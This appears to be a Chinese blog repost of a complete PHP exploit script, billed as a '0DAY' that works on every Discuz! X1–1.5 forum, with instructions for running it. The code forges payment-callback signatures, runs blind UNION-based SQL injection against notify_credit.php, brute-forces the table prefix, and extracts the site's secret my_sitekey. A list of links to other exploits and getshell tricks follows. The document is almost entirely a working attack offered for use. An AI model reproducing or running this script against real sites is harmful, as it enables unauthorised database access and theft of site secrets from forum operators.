最新Discuz! X1- 1.5 exp -2011 dz论坛通杀 0DAY
来源:互联网 发布:周末网络个人理财申请 编辑:程序博客网 时间:2024/05/22 05:19
使用方法 把下面内容保存为exp.php 在php环境下运行 php exp.php
===========================================
<?php
print_r(‘
+—————————————————————————+
Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit
by toby57 2010.11.05
mail: toby57 at 163 dot com
team: http://www.wolvez.org
+—————————————————————————+
‘);
if ($argc < 2) {
print_r(‘
+—————————————————————————+
Usage: php ‘.$argv[0].’ url [pre]
Example:
php ‘.$argv[0].’ http://localhost/
php ‘.$argv[0].’ http://localhost/ xss_
+—————————————————————————+
‘);
exit;
}
error_reporting(7);
ini_set(‘max_execution_time’, 0);
$url = $argv[1];
$pre = $argv[2]?$argv[2]:’pre_’;
$target = parse_url($url);
extract($target);
$path .= ‘/api/trade/notify_credit.php’;
$hash = array();
$hash = array_merge($hash, range(48, 57));
$hash = array_merge($hash, range(97, 102));
$tmp_expstr = “‘”;
$res = send();
if(strpos($res,’SQL syntax’)==false){var_dump($res);die(‘Oooops.I can NOT hack it.’);}
preg_match(‘/FROM\s([a-zA-Z_]+)forum_order/’,$res,$match);
if($match[1])$pre = $match[1];
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting Where ”=’”;
$res = send();
if(strpos($res,”doesn’t exist”)!==false){
echo “Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n”;
for($i = 1;$i<20;$i++){
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns Where table_schema=database() AND table_name LIKE ‘%forum_post_tableid%’ AND LENGTH(REPLACE(table_name,’forum_post_tableid’,”))=$i AND ”=’”;
$res = send();
if(strpos($res,’SQL syntax’)!==false){
$pre = ”;
$hash2 = array();
$hash2 = array_merge($hash2, range(48, 57));
$hash2 = array_merge($hash2, range(97, 122));
$hash2[] = 95;
for($j = 1;$j <= $i; $j++){
for ($k = 0; $k <= 255; $k++) {
if(in_array($k, $hash2)) {
$char = dechex($k);
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns Where table_schema=database() AND table_name LIKE ‘%forum_post_tableid%’ AND MID(REPLACE(table_name,’forum_post_tableid’,”),$j,1)=0x{$char} AND ”=’”;
$res = send();
if(strpos($res,’SQL syntax’)!==false){
echo chr($k);
$pre .= chr($k);break;
}
}
}
}
if(strlen($pre)){echo “\nCracked…Table_Pre:”.$pre.”\n”;break;}else{die(‘GET Table_pre Failed..’);};
} } };
echo “Please Waiting….\n”;
$sitekey = ”;
for($i = 1;$i <= 32; $i++){
for ($k = 0; $k <= 255; $k++) {
if(in_array($k, $hash)) {
$char = dechex($k);
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting Where skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ”=’”;
$res = send();
if(strpos($res,’SQL syntax’)!==false){
echo chr($k);
$sitekey .= chr($k);break;
}}}}
if(strlen($sitekey)!=32)die(“\n”.’can NOT get the my_sitekey..’);
echo “\n”.’Exploit Successfully.’.”\nmy_sitekey:{$sitekey}”;
exit;
function sign($exp_str){
return md5(“attach=tenpay&mch_vno={$exp_str}&retcode=0&key=”);
}
function send(){
global $host, $path, $tmp_expstr;
$expdata = “attach=tenpay&retcode=0&trade_no=%2527&mch_vno=”.urlencode(urlencode($tmp_expstr)).”&sign=”.sign($tmp_expstr);
$data = “POST $path HTTP/1.1\r\n”;
$data .= “Host: $host\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “Content-Length: “.strlen($expdata).”\r\n”;
$data .= “Connection: Close\r\n\r\n”;
$data .= $expdata;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = ”;
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
- 最新Discuz! X1- 1.5 exp -2011 dz论坛通杀 0DAY
- Discuz! X2.0 0day EXP
- discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来
- Discuz! X1 论坛 全新安装图文教程
- DEDE调用DZ X1.5或者DZ论坛帖子的N种方法
- C#模拟登录Discuz论坛 附代码 Discuz X1.5
- DISCUZ! X1.5 X2.0RC完美解决用户组上传论坛附件大小限制!
- phpcms 2008最新0day加批量EXP代码
- 最新Java 0day漏洞分析及EXP下载
- DZ论坛横排美化,代码详细分析[Discuz 7.0]
- Discuz!所有版本通杀 存储型XSS 0day
- discuz X2 0day
- [DZ X2.5实用教程] DZ X2.5(Discuz!)论坛-QQ企业OR域名邮箱作为发信邮箱设置教程
- 两个方法解决DZ(Discuz ! x3.2 )论坛安装模板不是正版应用的问题
- serv-u最新通杀所有版本0day
- serv-u最新通杀所有版本0day
- FCKeditor-Exp通杀0day
- DZ论坛小技巧
- static的作用
- Mysql利用/*!select*/ 突破防注入
- 域内计算机和用户获取
- 一份比较详细的DOS命令说明!
- 另类抓win hash法
- 最新Discuz! X1- 1.5 exp -2011 dz论坛通杀 0DAY
- syWebEditor编辑器最新0day
- DedeCMS 支付页面注入漏洞
- 5UCMS漏洞利用
- 赋值运算符重载函数
- poj2240
- 杰奇小说连载系统任意文件上传0day
- 风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
- poj2240